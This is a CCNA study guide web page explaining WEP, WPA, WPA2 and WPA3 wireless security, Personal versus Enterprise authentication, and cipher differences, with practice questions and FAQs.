NetworkingCCNA

CCNA Wireless Security: WEP, WPA, WPA2, WPA3 & PSK vs Enterprise

Wireless security is a required topic on CCNA 200-301. You need to understand the progression from WEP (broken) through WPA, WPA2, and WPA3, the difference between Personal (PSK) and Enterprise (802.1X) modes, and the encryption algorithms each generation uses. This guide covers the key security features, their weaknesses, and what the exam expects you to know about each standard.

8 min

5 sections · 5 exam key points

5 practice questions

WEP: the broken original

Wired Equivalent Privacy (WEP) was the original 802.11 wireless security standard from 1997. WEP uses RC4 stream cipher with 40-bit or 104-bit keys. The fatal flaw: WEP reuses the same keystream, and the Initialization Vector (IV) is only 24 bits, leading to IV reuse that allows passive cryptanalysis. WEP can be cracked in minutes with freely available tools.

WEP should never be used. It is included in CCNA only as historical context and to understand why later standards were developed. If you see WEP as an answer option and the question is about 'secure' or 'recommended' — eliminate it immediately.

WPA: the interim fix

Wi-Fi Protected Access (WPA) was released in 2003 as an emergency replacement for WEP while 802.11i (WPA2) was being finalized. WPA uses TKIP (Temporal Key Integrity Protocol), which wraps RC4 with per-packet key mixing and a message integrity code (MIC, called 'Michael') to prevent the IV reuse attack.

WPA was designed to run on existing WEP hardware via firmware update. While significantly more secure than WEP, TKIP itself has known weaknesses (TKIP MIC failure attacks). WPA/TKIP is deprecated and should be replaced with WPA2 or WPA3.

WPA introduced the Personal (PSK) and Enterprise (802.1X) modes that carry through to WPA2 and WPA3.

WPA2: the current standard

WPA2 (802.11i) replaced WPA as the security standard in 2004. WPA2 uses CCMP (Counter Mode CBC-MAC Protocol) based on AES (Advanced Encryption Standard), a fundamentally stronger cipher than RC4. WPA2 is the minimum acceptable security standard for any current wireless deployment.

WPA2-Personal (WPA2-PSK) uses a Pre-Shared Key — a passphrase known to all users. The passphrase is used to derive the Pairwise Master Key (PMK). All clients use the same passphrase. Simple to deploy; weakness is that if the passphrase is compromised, all clients are affected, and there's no per-user identity.

WPA2-Enterprise uses 802.1X/EAP for authentication. Each user has individual credentials authenticated by a RADIUS server. Per-user PMK is derived dynamically per session — compromise of one user's session key doesn't affect others. Enterprise mode provides the identity-based access control needed for corporate networks.

WPA2 vulnerability: KRACK (Key Reinstallation Attack, 2017) demonstrated that WPA2 handshake could be manipulated. Mitigated by vendor patches. Also, weak PSK passphrases are vulnerable to offline dictionary attacks — use long, random passphrases.

WPA3: the current best practice

WPA3 was released in 2018 to address WPA2 weaknesses. WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals), a protocol based on the Dragonfly handshake. SAE provides forward secrecy — even if an attacker records traffic and later obtains the passphrase, they cannot decrypt previously recorded sessions. SAE also resists offline dictionary attacks.

WPA3-Enterprise mandates 192-bit cryptographic strength (CNSA suite) for high-security environments. It uses stronger AES-256 (GCMP-256) and SHA-384 as the minimum cipher suite.

WPA3 Enhanced Open (OWE, Opportunistic Wireless Encryption) encrypts open network traffic without requiring a password. This protects users on public Wi-Fi from passive eavesdropping even on networks with no password — previously, open networks transmitted all traffic in plaintext.

WPA3 transition mode allows WPA3 and WPA2 devices to coexist on the same SSID during migration. For CCNA: know the key improvements — SAE replaces PSK, forward secrecy, stronger mandatory ciphers.

Authentication methods: Open, PSK, 802.1X

Open authentication (no security): no credentials required. Any device can join. Appropriate only for captive portal environments where a different mechanism handles access control. Never acceptable for corporate networks.

WPA2/3-Personal (PSK/SAE): passphrase authentication. All devices use the same credential. Easy to manage for small environments; doesn't scale because you can't revoke access for one user without changing the passphrase for everyone.

WPA2/3-Enterprise (802.1X/EAP): individual user credentials. Integrates with corporate identity systems (Active Directory via RADIUS). Users can be individually authenticated, authorized, and revoked. Required for compliance-driven environments (PCI-DSS, HIPAA).

Wireless security standard comparison

Standard	Encryption	Auth method	Key exchange	Status
WEP	RC4 (40/104-bit)	Open/Shared Key	Static key	Broken — never use
WPA	TKIP (RC4)	PSK or 802.1X	TKIP per-packet	Deprecated
WPA2-Personal	CCMP (AES-128)	PSK	4-way handshake	Current standard
WPA2-Enterprise	CCMP (AES-128)	802.1X/EAP + RADIUS	Dynamic per-session	Current standard (enterprise)
WPA3-Personal	CCMP (AES-128)	SAE (Dragonfly)	Forward secrecy	Recommended
WPA3-Enterprise	GCMP-256 (AES-256)	802.1X/EAP + RADIUS	192-bit suite	Highest security

Key exam facts — CCNA

WEP: broken, RC4, never use. WPA: TKIP/RC4, deprecated. WPA2: CCMP/AES-128. WPA3: SAE + forward secrecy
WPA2-Personal: PSK (shared passphrase). WPA2-Enterprise: 802.1X (individual credentials via RADIUS)
SAE (WPA3-Personal) resists offline dictionary attacks and provides forward secrecy
CCMP is based on AES — WPA2's encryption. TKIP is based on RC4 — WPA's (weaker)
WPA3 Enhanced Open (OWE) encrypts open networks without a password

Common exam traps

WPA2 and WPA3 use the same encryption algorithm

WPA2-Personal/Enterprise uses CCMP (AES-128). WPA3-Enterprise uses GCMP-256 (AES-256) as the minimum. WPA3-Personal also uses CCMP but replaces PSK with SAE for key exchange.

Using a complex password with WPA2-Personal is as secure as WPA2-Enterprise

WPA2-Enterprise provides per-user authentication, per-session dynamic keys, and the ability to revoke individual access. WPA2-Personal shares one passphrase among all users — a compromised passphrase affects everyone, and there's no per-user identity or revocation without changing the password.

WEP is acceptable for legacy devices that don't support WPA2

WEP is cryptographically broken and can be cracked in minutes. If a device only supports WEP, it should be replaced or isolated on a separate network with no access to sensitive resources.

Practice questions — Wireless Security (WPA)

These questions are representative of what you will see on CCNA exams. The correct answer and explanation are shown immediately below each question.

Q1.Which wireless security protocol uses CCMP based on AES for encryption?

A.WEP

B.WPA (TKIP)

C.WPA2

D.WPA3-Enterprise only

Explanation: WPA2 (802.11i) uses CCMP (Counter Mode CBC-MAC Protocol) based on AES-128 as its encryption algorithm. WEP and WPA use RC4-based encryption (WEP directly, WPA via TKIP).

Q2.A hospital needs wireless security where each doctor authenticates with their individual Active Directory credentials. Which solution is appropriate?

A.WPA2-Personal with a strong passphrase

B.WEP with MAC filtering

C.WPA2-Enterprise with 802.1X and RADIUS

D.WPA3-Personal with SAE

Explanation: WPA2-Enterprise uses 802.1X/EAP with a RADIUS server that can integrate with Active Directory. Each user authenticates with individual credentials, enabling per-user access control, accounting, and revocation.

Q3.Which WPA3 feature protects previously recorded wireless traffic even if the passphrase is compromised later?

A.AES-256 encryption

B.SAE (Simultaneous Authentication of Equals) with forward secrecy

C.TKIP per-packet key mixing

D.RADIUS integration

Explanation: WPA3-Personal uses SAE (Simultaneous Authentication of Equals), which provides forward secrecy. Each session uses unique keys derived through the SAE handshake — obtaining the passphrase later cannot decrypt previously captured sessions.

Q4.Which statement correctly describes a weakness of WPA2-Personal compared to WPA2-Enterprise?

A.WPA2-Personal uses weaker AES encryption

B.WPA2-Personal cannot encrypt traffic

C.WPA2-Personal uses a shared passphrase with no per-user identity or individual revocation

D.WPA2-Personal requires a RADIUS server

Explanation: WPA2-Personal uses AES encryption (same strength as Enterprise) but authenticates all users with the same pre-shared passphrase. There is no per-user identity; revoking one user requires changing the passphrase for everyone. Enterprise mode provides individual authentication and revocation.

Q5.WPA3 Enhanced Open (OWE) provides which security feature on open wireless networks?

A.Username/password authentication

B.Encryption of traffic without requiring a password

C.AES-256 mandatory encryption

D.RADIUS server integration

Explanation: WPA3 Enhanced Open (Opportunistic Wireless Encryption) encrypts open network traffic without requiring a passphrase. This protects against passive eavesdropping on public Wi-Fi networks that previously transmitted all data in plaintext.

Frequently asked questions — Wireless Security (WPA)

What is the difference between WPA2-Personal and WPA2-Enterprise?

WPA2-Personal uses a pre-shared key (passphrase) — all users share the same credential. WPA2-Enterprise uses 802.1X/EAP with a RADIUS server — each user authenticates with individual credentials. Enterprise provides per-user identity, accounting, and the ability to revoke individual access without affecting other users.

Why is WEP considered broken?

WEP uses RC4 with only a 24-bit Initialization Vector (IV), which is reused frequently. The keystream reuse allows an attacker to recover the WEP key using passive traffic capture and cryptanalysis — tools can crack WEP in minutes without knowing the password. WEP has no protection against traffic injection or key recovery.

What makes WPA3 better than WPA2?

WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals), providing forward secrecy and resistance to offline dictionary attacks. WPA3-Enterprise mandates stronger 192-bit cryptography. WPA3 Enhanced Open encrypts previously plaintext open networks. SAE forward secrecy is the most significant improvement.

What encryption does WPA use vs WPA2?

WPA uses TKIP (Temporal Key Integrity Protocol) based on RC4 — it was designed to run on WEP hardware via firmware update. WPA2 uses CCMP (Counter Mode CBC-MAC Protocol) based on AES-128, a fundamentally stronger cipher. TKIP is deprecated; WPA2/CCMP is the minimum acceptable standard.

Can WPA2 and WPA3 devices coexist on the same wireless network?

Yes, through WPA3 Transition Mode. The AP advertises both WPA2 and WPA3 on the same SSID. WPA3-capable devices use WPA3 (SAE); WPA2-only devices use WPA2 (PSK). This allows gradual migration without requiring immediate replacement of all client devices.

Practice this topic

CCNApractice questions

Test yourself on Wireless Security (WPA)

JT Exams routes you to questions in your exact weak areas — automatically, after every session.

Free practice test Start 7-Day Free Trial

No credit card · Cancel anytime